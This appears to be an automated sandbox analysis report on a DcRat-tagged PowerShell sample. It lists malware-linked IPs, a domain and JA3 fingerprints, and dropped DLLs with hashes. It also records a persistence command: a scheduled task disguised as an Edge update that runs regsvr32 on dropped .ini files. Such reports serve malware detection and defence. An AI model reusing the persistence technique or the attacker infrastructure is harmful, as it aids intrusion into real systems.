Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target OpenWith.exe, PID 5208 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 5560 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7104 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: fBcMVl6ns6.lnk

Simulations

Behavior and APIs

Time	Type	Description
14:52:07	API Interceptor	90x Sleep call for process: powershell.exe modified
14:52:49	API Interceptor	3052035x Sleep call for process: utox_x86_x64.exe modified
14:52:58	API Interceptor	1x Sleep call for process: wmprph.exe modified
14:53:17	API Interceptor	1x Sleep call for process: regsvr32.exe modified
20:52:17	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044} path: regsvr32 s>/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
20:52:56	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404} path: regsvr32 s>/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
37.97.185.116	path.ps1	Get hash	malicious	DcRat	Browse
37.97.185.116	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
195.93.190.6	path.ps1	Get hash	malicious	DcRat	Browse
195.93.190.6	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
148.251.23.146	path.ps1	Get hash	malicious	DcRat	Browse
104.233.104.126	path.ps1	Get hash	malicious	DcRat	Browse
104.233.104.126	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
130.133.110.14	path.ps1	Get hash	malicious	DcRat	Browse
194.249.212.109	path.ps1	Get hash	malicious	DcRat	Browse
194.249.212.109	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
136.243.141.187	path.ps1	Get hash	malicious	DcRat	Browse
136.243.141.187	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
163.172.136.118	path.ps1	Get hash	malicious	DcRat	Browse
163.172.136.118	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
95.215.44.78	path.ps1	Get hash	malicious	DcRat	Browse
95.215.44.78	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
193.124.186.205	path.ps1	Get hash	malicious	DcRat	Browse
193.124.186.205	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rocketdocs.lol	path.ps1	Get hash	malicious	DcRat	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OnlineSASFR	path.ps1	Get hash	malicious	DcRat	Browse	163.172.136.118
	https://yourferguson.org/court-watch-october-30-2023/?fbclid=IwZXh0bgNhZW0CMTEAAR3dOwpQMI1HpEJMcLfneo2Ce-TuuXHtVI8-78YDrHW9adORVlMEABT0ELU_aem_CL7dDvEuGMkB8YFGhVQWUg	Get hash	malicious	Unknown	Browse	212.129.43.222
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	62.210.201.207
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	62.210.201.207
	na.elf	Get hash	malicious	Unknown	Browse	51.158.219.42
	aA45th2ixY.exe	Get hash	malicious	Xmrig	Browse	51.15.58.224
	http://ak437453-76542337354.com/	Get hash	malicious	Unknown	Browse	51.158.227.247
	https://wtm.entree-plat-dessert.com/r/eNpNj1uTojAQhX8N+6aYG4SHqS0VWHXB9Vbj4stUCAGDXJyQ6OKv38zbdPXDV+d096l+ugGEHqAuED7GiAhQAMooRDiABQc5LH3MCBXCBRQRF/vEzSHiXglnyKdF4RHEwAx6EAQ5w7aC0vVcQNze/WnerlrfBwfNHRjbZlybacuUFLxhUolpqazKjRxkJyxpprSYMDPJVc/7Rk4GZriYcKPUOOFWcuASYD/wCJyy4e6gmOmPVhTStA4KRaE/bIIDPdZab2E9bonJqrPus+F925pGy+8DQ28UF1/LnVZC3BumCzEMQukfBX/zy8terrvuDI76doov9WG1mh1q7Z19Ss3Yb45ZwoN2mR6jT/gv/zsm6EqiYVNXy/EQZy/jwEXrD3tCSLV+be2H/q7u9CuDFsPPMLvmyfr3fPt4l+v9Zb5vg67LCKw31zGsM/JK8GkbJBEGYeWd0hSI4hzT3QPXvyL5x95+7goVLhqqWHqoUVJ9xW00jWrQL3OSnld9f8tv7HEL/wMooptN	Get hash	malicious	Unknown	Browse	212.129.3.112
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	163.172.136.118
	WannaCry.bin.zip	Get hash	malicious	Conti, Wannacry	Browse	163.172.131.88
CLOUD-SOUTHUS	path.ps1	Get hash	malicious	DcRat	Browse	104.233.104.126
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.233.104.126
	final_payload.bin.exe	Get hash	malicious	XWorm	Browse	216.173.64.63
	https://askallegiance.com	Get hash	malicious	Unknown	Browse	104.167.193.130
	https://usps-track-packages.com	Get hash	malicious	Unknown	Browse	216.173.64.194
	Lisect_AVT_24003_G1B_122.exe	Get hash	malicious	Unknown	Browse	104.143.250.45
	SlHgSOYcMY.exe	Get hash	malicious	Unknown	Browse	104.167.217.91
	iMJZGYeU7K.elf	Get hash	malicious	Mirai	Browse	38.130.219.186
	INVOICE087667899.exe	Get hash	malicious	Unknown	Browse	104.233.20.196
	EXTERNAL Desert Diamond Casinos Entertainment- New Purchase Order 8433333.msg	Get hash	malicious	HTMLPhisher	Browse	104.167.241.201
HETZNER-ASDE	path.ps1	Get hash	malicious	DcRat	Browse	136.243.141.187
	ssk7Ah3h5D.elf	Get hash	malicious	Unknown	Browse	116.203.104.203
	https://hnt.zkg.mybluehost.me/CA/LET	Get hash	malicious	HTMLPhisher	Browse	135.181.58.223
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	136.243.38.220
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	136.243.38.220
	na.elf	Get hash	malicious	Unknown	Browse	138.201.28.181
	na.elf	Get hash	malicious	Unknown	Browse	116.203.104.203
	na.elf	Get hash	malicious	Unknown	Browse	116.203.104.203
	reswnop.exe	Get hash	malicious	Emotet	Browse	138.201.140.110
	7AeSqNv1rC.exe	Get hash	malicious	MicroClip, Vidar	Browse	49.12.106.214
GCN-UA	path.ps1	Get hash	malicious	DcRat	Browse	195.93.190.6
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	195.93.190.6
	file.exe	Get hash	malicious	SystemBC	Browse	91.192.136.48

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	path.ps1	Get hash	malicious	DcRat	Browse	172.202.163.200
	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Get hash	malicious	LummaC, Vidar	Browse	172.202.163.200
	Demande de proposition de AVANTAGE INDUSTRIEL INC.pdf	Get hash	malicious	HtmlDropper	Browse	172.202.163.200
	https://shorturl.at/yPmuH?sEBM=mt3zoN1Of	Get hash	malicious	Unknown	Browse	172.202.163.200
	https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==	Get hash	malicious	HTMLPhisher	Browse	172.202.163.200
	77IyY7nCKB.xls	Get hash	malicious	Unknown	Browse	172.202.163.200
	EDc1DW9OsQ.xlsx	Get hash	malicious	Unknown	Browse	172.202.163.200
	Atlanta Office Interiors #024-010.pdf	Get hash	malicious	Unknown	Browse	172.202.163.200
	https://dc.dolshgdh.site/?Ufrj=g5	Get hash	malicious	Unknown	Browse	172.202.163.200
	EPAYMENT_Receipt.html	Get hash	malicious	Unknown	Browse	172.202.163.200
3b5074b1b5d032e5620f69f9f700ff0e	path.ps1	Get hash	malicious	DcRat	Browse	188.114.97.3 188.114.96.3
	playmod24.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	shipment details.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	XDA_CDS v6.8.54_SE.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	E_receipt.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	92ZZIUHzPQ.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3 188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\Gga6.ini	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
C:\Users\user\AppData\Roaming\M08e.ini	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse
C:\Users\user\Desktop\utox_x86_x64.exe	path.ps1	Get hash	malicious	DcRat	Browse

Created / dropped Files

C:\Users\Public\ajbs50ul.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2322503
Entropy (8bit):	7.351293589769997
Encrypted:	false
SSDEEP:	49152:fIGHiuBfswUwl+GdRI2UET1SUvj0Ug6j9iuXWvpAqahtX8+34+vSVHstzn+qpEjs:fNCuBfZ4GdfUaj0UgM5WviXtT34+vBJV
MD5:	8837DF25AABC4FAD85E851ACA192F714
SHA1:	C4FBD38356B7EE16EAF21DEB83170BBCB0FE566A
SHA-256:	741CEE2C6F6F8EE8A54923FA2A0C88085CEDE35BDC2E95B1B9F1800E894E6C19
SHA-512:	93F712AE3CA726B090DF270FEB1421EA98778260B7FE309E06AC3887B396D3DC8AB41655EC7D15A57CAC8B467CCA0395A52EF965765A26C9597F6512FDAD88E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...w-.f....e.....&....*.......................@............................. ......J.#...`... .................................................H............`...t...........................................J..(...................................................text...............................`..`.data...............................@....rdata..............................@..@.pdata...t...`...v...D..............@..@.xdata..p...........................@..@.bss.....................................idata..H............r..............@....CRT....h...........................@....tls................................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.383282394444275
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1Bv:ML9E4KQ71qE4GIsD
MD5:	00930768B2E044245AC5529BC4F2FFDF
SHA1:	DF262F47F31653AAE570477B12B90B2E385A8D50
SHA-256:	E0A23AC0FD66AC2AD5922D20187B374A1B7B148FF47CABB69441EB2F699008C8
SHA-512:	76F371B3D2FCE707DA45DCA1755DE56BA7AC8827E5F18F900E52AEF35AEF3D42B39F656CC08A10372872BA601AFD9E6F3D930A98F92A3F9A885E9B6CBAF38ADA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeczgi43.tht.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2ctgb41.zc3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnkewsjx.th4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbrff2b0.uox.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkvuje5c.ujv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbspg2wm.obn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktt01nkr.xq1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kus2hrfz.ini.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqge4sys.ry3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzuodjf0.zc1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\second_data_temp.zip

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	94081
Entropy (8bit):	7.867349334322687
Encrypted:	false
SSDEEP:	1536:6JlEt2c1bx3Wv8FFdY38bjlMyrr1D2iri2KQjHhIvwwwXNjsbdCnhBqCMEgAVvDG:QlsvdYMP1r8QjB99ICniZsG
MD5:	33725DFCC8FFCBC026839DA2BDB55DAE
SHA1:	35F249AD0850B4EDBC62AF40DE427EF2BDD99C78
SHA-256:	0DE6B62B625EA86A56117A1EDCEFF37DFA1D2492BB62993BAAF9C59FBE1FF789
SHA-512:	9D663C570DF995BB8402AE5A8236A47EE2581439CFF6F53FB0FCC84A1960D448963DA94F9FA91849DD10020DC08FF8A3096420DE57BC6653722480180807D4B6
Malicious:	false
Preview:	PK..........AY...@.n..........second_data.bin.\y\.....,.n.$..9$.Ri...$."G.\.,..P.TB.&.F.)R....I.fE..}..s...{....g...Z.Z{.7..,..E..o.{iF".YO.dTE.D.'..04"%.....0N.x`.C......1..&.Q.r...}..zW<=D.m ..'.[.L.@...r..A...*Kn...X.J+7....,..../....4.........n.`04V.Y.......q...............PJUT.'>..]....~.og........%.....F..!.....8..\|.5....".....-.............%.1....?2 ...A.[k..........5E-.U{io...`\|..H..;..?<....!..Z.?.1rs5".X...d.T.86\|K#..G<K.i.d.Y4....S>-a...2W..8...{.L.C....... .s..H......_.}n(..}oz?.c...Z.l...9Rb...Hs.........Rt.W.._y+f9O......m./.......Cg....kq.&[..N.e./.[.~...qYx........O.I.\Q...U..k.f.].c...N..r.......O.ARv......^j..Z...._v...z9.b..X.AVv.....k\|....7g....>g....7&B\.r.........E.UB.6C~Y.[z.:.B0.[S.....g--.p_..3......=.........[.....{.IFU.7>=.'#......S...v..>...,..b.i..0#w.F...E.....d...^........^...n.....\.....mk..S.!_..0.uc...Z........s.v.....I..r....2.b...PW....t...v...=Z`.f..x...'._.{..wu....L._.t....w.....x...~....$K(R....J..

C:\Users\user\AppData\Roaming\Gga6.ini

Download File

Process:	C:\Windows\System32\rekeywiz.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	486400
Entropy (8bit):	6.904893954535027
Encrypted:	false
SSDEEP:	6144:gxOiJ9Cfi+tWW6AKEFR3hdf0GDm5iQ0d6ghn0N97tAD/IO9qckqHDUIKMB3emqqz:gxOiqfRD6kOb6node/B9U1MBOmqqra
MD5:	5BF9C5C649E1AF61B41EBCDFCA9597BC
SHA1:	8F83FFE801801567DA2933A3033F3D2AE0059AD3
SHA-256:	55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
SHA-512:	32E7CF427EBA9E903D77B59F7299864149C6DD4B19FE59CE3C1E3144DB171E3C003CA06EA0E8B3B5CAF3E4DA4559F748760B6CB0256D063140797C32AADCD029
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Joe Sandbox View:	Filename: 81zBpBAWwc.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E..f..........."...*.....h......0................................................l....`... .................................................................................\|...............................(...................X................................text...X...........................`..`.data...............................@....rdata..............................@..@.pdata..............................@..@.xdata...2...0...4..................@..@.bss....@....p...........................edata...............N..............@..@.idata...............P..............@....CRT....`............b..............@....tls.................d..............@....reloc..\|............f..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\M08e.ini

Download File

Process:	C:\Users\Public\ajbs50ul.bat
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1069056
Entropy (8bit):	7.687858240798343
Encrypted:	false
SSDEEP:	24576:J80IV0b83n9cPUhWDn3nyjAhosTiwTJ80qIa07x72:a0DbeGU0iTsTi30q+7x72
MD5:	60A55B1D8E739216CADD3E31D7412F03
SHA1:	8B5C284796A1EFA1DF8A3EDDD27070D374E1CC54
SHA-256:	BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
SHA-512:	C06CB2B86F7A9DE5243F4395FB40FA88A7669F3E427D427AFB95801DE447BEB8F616847890AE12CFC6060EC7215CEB370CD61B5CF0395EAB81312121060DC7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Joe Sandbox View:	Filename: 81zBpBAWwc.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...O-.f..........."...*.....L......0....................................................`... ......................................p..........................................\|...............................(...................X................................text...X...........................`..`.data...............................@....rdata.. ...........................@..@.pdata..............................@..@.xdata...2... ...4..................@..@.bss....@....`...........................edata.......p.......2..............@..@.idata...............4..............@....CRT....`............F..............@....tls.................H..............@....reloc..\|............J..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\Tox\tox_save.tox

Download File

Process:	C:\Users\user\Desktop\utox_x86_x64.exe
File Type:	data
Category:	dropped
Size (bytes):	1485
Entropy (8bit):	5.353478410858702
Encrypted:	false
SSDEEP:	24:fbjE2DsIOJ7pisIOJ7pksIOJ7pBDqLMmPD/yk7pksIODJAf31WbHX:fbjE6O5YO52O57wL/ys2O9b3
MD5:	42D5AABB4ED8287C7CB32135249BC1BC
SHA1:	040D45E950DF2E676D5340CD2FBC587FE149ECFE
SHA-256:	BCD944141CC677FA148B3B506CAF597335CA8B9D697C69B7ED3D16D5AC3942CA
SHA-512:	F60E8B7F7142D10A32DA911ACC5F14194BCD238D95209A53F9F7434B70673563ABA904FBD3A8742328D01DC01E7480EA8D601FBAABB3D08D9A8D89FB95E38950
Malicious:	false
